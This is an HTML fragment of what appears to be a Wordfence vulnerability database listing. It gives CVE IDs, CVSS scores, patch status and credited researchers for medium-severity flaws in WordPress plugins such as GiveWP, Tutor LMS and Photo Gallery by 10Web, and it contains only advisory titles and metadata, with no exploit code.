<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d59151c-aa50-4183-b429-143580961cb1" target="_blank" rel="noopener">GiveWP &lt;= 4.16.8 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85113" target="_blank" rel="noopener noreferrer">							CVE-2026-85113						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">GiveWP – Donation Plugin and Fundraising Platform</a> <span class="wfvr-software-slug">[give]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d59151c-aa50-4183-b429-143580961cb1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/05c50442-570b-45cf-816a-c7a5b712ba21" target="_blank" rel="noopener">InfiniteWP Client &lt;= 1.13.9 &#8211; Authenticated (Admin+) SQL Injection via &#8216;iwp_get_comments_*&#8217; Array Key</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17576" target="_blank" rel="noopener noreferrer">							CVE-2026-17576						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/iwp-client" target="_blank" rel="noopener">InfiniteWP Client</a> <span class="wfvr-software-slug">[iwp-client]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/05c50442-570b-45cf-816a-c7a5b712ba21" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c2d029a-5c66-4bae-bf5d-f164f07d5d63" target="_blank" rel="noopener">JetFormBuilder &lt;= 3.6.5.2 &#8211; Authenticated (Administrator+) Arbitrary File Deletion</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19860" target="_blank" rel="noopener noreferrer">							CVE-2026-19860						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jetformbuilder" target="_blank" rel="noopener">JetFormBuilder — Dynamic Blocks Form Builder</a> <span class="wfvr-software-slug">[jetformbuilder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5c2d029a-5c66-4bae-bf5d-f164f07d5d63" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c9dca86f-b853-4d29-ae43-bd6ea74d058d" target="_blank" rel="noopener">Photo Gallery by 10Web &lt;= 1.8.44 &#8211; Authenticated (Author+) SQL Injection via &#8216;album_id&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85652" target="_blank" rel="noopener noreferrer">							CVE-2026-85652						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery" target="_blank" rel="noopener">Photo Gallery by 10Web – Mobile-Friendly Image Gallery</a> <span class="wfvr-software-slug">[photo-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxnx" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5654f29de740409684396c829b955ab6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5654f29de740409684396c829b955ab6"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxnx" target="_blank" rel="noopener">VuxNx</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c9dca86f-b853-4d29-ae43-bd6ea74d058d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3dbbb5b5-b322-4645-99b7-af88b8f0c13a" target="_blank" rel="noopener">Product Feed Manager for WooCommerce – RexFeed – Sell on 200+ Shopping Channels &lt;= 7.12.0 &#8211; Authenticated (Contributor+) SQL Injection</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66580" target="_blank" rel="noopener noreferrer">							CVE-2026-66580						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/best-woocommerce-feed" target="_blank" rel="noopener">Product Feed Manager for WooCommerce – RexFeed – Sell on 200+ Shopping Channels</a> <span class="wfvr-software-slug">[best-woocommerce-feed]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/john-ryan-albon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ef9ce43e8a09db904dc26bffcab4c696.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ef9ce43e8a09db904dc26bffcab4c696"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/john-ryan-albon" target="_blank" rel="noopener">John Ryan Albon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3dbbb5b5-b322-4645-99b7-af88b8f0c13a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/244051ef-5357-4b16-b690-46c8fea56847" target="_blank" rel="noopener">Tutor LMS &lt;= 4.0.8 &#8211; Insecure Direct Object Reference to Authenticated (Subscriber+) Sensitive Information Exposure via &#8216;student_id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89333" target="_blank" rel="noopener noreferrer">							CVE-2026-89333						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dthangws" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29bd5dd110d9d483d533b011e29522de.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29bd5dd110d9d483d533b011e29522de"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dthangws" target="_blank" rel="noopener">Dthangws</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/244051ef-5357-4b16-b690-46c8fea56847" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8ded7bd6-3dd8-4659-9704-f197e7c2f941" target="_blank" rel="noopener">Wow Elements Addons for Elementor &lt;= 1.11.2 &#8211; Authenticated (Contributor+) Server-Side Request Forgery via Changelog File Setting</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1641" target="_blank" rel="noopener noreferrer">							CVE-2026-1641						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wow-elements-addons-for-elementor" target="_blank" rel="noopener">Wow Elements Addons for Elementor</a> <span class="wfvr-software-slug">[wow-elements-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/waris-damkham" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d923d0a20877857f86aaa6c686c92bdc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d923d0a20877857f86aaa6c686c92bdc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/waris-damkham" target="_blank" rel="noopener">Waris Damkham</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8ded7bd6-3dd8-4659-9704-f197e7c2f941" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/561a54ac-d827-4bf0-a458-9199c4e9c182" target="_blank" rel="noopener">WP Directory Kit &lt;= 1.5.4 &#8211; Authenticated (Custom+) SQL Injection via &#8216;order_by&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16588" target="_blank" rel="noopener noreferrer">							CVE-2026-16588						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdirectorykit" target="_blank" rel="noopener">WP Directory Kit</a> <span class="wfvr-software-slug">[wpdirectorykit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/achmad-adhikara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c451f7be2150d3f56bd9dd4de4f1998b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c451f7be2150d3f56bd9dd4de4f1998b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/achmad-adhikara" target="_blank" rel="noopener">adhikara13</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/561a54ac-d827-4bf0-a458-9199c4e9c182" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f439d60-0295-4ea8-b16d-9cdd0d866a8d" target="_blank" rel="noopener">WP Inventory Manager &lt;= 2.5.1 &#8211; Authenticated (Contributor+) SQL Injection via &#8216;where&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17607" target="_blank" rel="noopener noreferrer">							CVE-2026-17607						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-inventory-manager" target="_blank" rel="noopener">WP Inventory Manager</a> <span class="wfvr-software-slug">[wp-inventory-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f439d60-0295-4ea8-b16d-9cdd0d866a8d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff6b9c3e-b716-4b58-80fa-f1f115856c6c" target="_blank" rel="noopener">Advanced Popups &lt;= 1.2.3 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via &#8216;Notification Button Link&#8217; Field</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11996" target="_blank" rel="noopener noreferrer">							CVE-2026-11996						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-popups" target="_blank" rel="noopener">Advanced Popups</a> <span class="wfvr-software-slug">[advanced-popups]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-cong-quang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01e9ff51a749f2beebcde4e6d5b68519.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01e9ff51a749f2beebcde4e6d5b68519"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-cong-quang" target="_blank" rel="noopener">Nguyen Cong Quang</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ff6b9c3e-b716-4b58-80fa-f1f115856c6c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e0ad9116-8ec3-482e-be03-0413980f412f" target="_blank" rel="noopener">All Bootstrap Blocks &lt;= 1.3.31 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88993" target="_blank" rel="noopener noreferrer">							CVE-2026-88993						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-bootstrap-blocks" target="_blank" rel="noopener">All Bootstrap Blocks</a> <span class="wfvr-software-slug">[all-bootstrap-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e0ad9116-8ec3-482e-be03-0413980f412f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/34c573f4-bc21-4a5f-a44a-779c523c3212" target="_blank" rel="noopener">AppMySite &lt;= 3.15.3 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via save_ams_license_key AJAX Handler</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13770" target="_blank" rel="noopener noreferrer">							CVE-2026-13770						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/appmysite" target="_blank" rel="noopener">AppMySite – WordPress &amp; WooCommerce Mobile App Builder (No-Code Android &amp; iOS App Maker)</a> <span class="wfvr-software-slug">[appmysite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c10dbe06f111ce709fdc2628e94ac9a1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c10dbe06f111ce709fdc2628e94ac9a1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mitchell" target="_blank" rel="noopener">Mitchell</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/34c573f4-bc21-4a5f-a44a-779c523c3212" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/adda0c06-80c7-4e2b-af18-8b2e6258e39a" target="_blank" rel="noopener">Auto Upload Images &lt;= 3.3.2 &#8211; Authenticated (Contributor+) Server-Side Request Forgery via &#8216;src&#8217; Attribute of &lt;img&gt; Tags</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12106" target="_blank" rel="noopener noreferrer">							CVE-2026-12106						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/auto-upload-images" target="_blank" rel="noopener">Auto Upload Images</a> <span class="wfvr-software-slug">[auto-upload-images]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/c-y" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2968a83547342a0cfd609bc354946f45.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2968a83547342a0cfd609bc354946f45"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/c-y" target="_blank" rel="noopener">Scc2</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/adda0c06-80c7-4e2b-af18-8b2e6258e39a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/629fee36-1fea-4a4d-acc2-9ba18d0b6487" target="_blank" rel="noopener">Bold Page Builder &lt;= 5.9.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;shortcode_content&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5920" target="_blank" rel="noopener noreferrer">							CVE-2026-5920						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
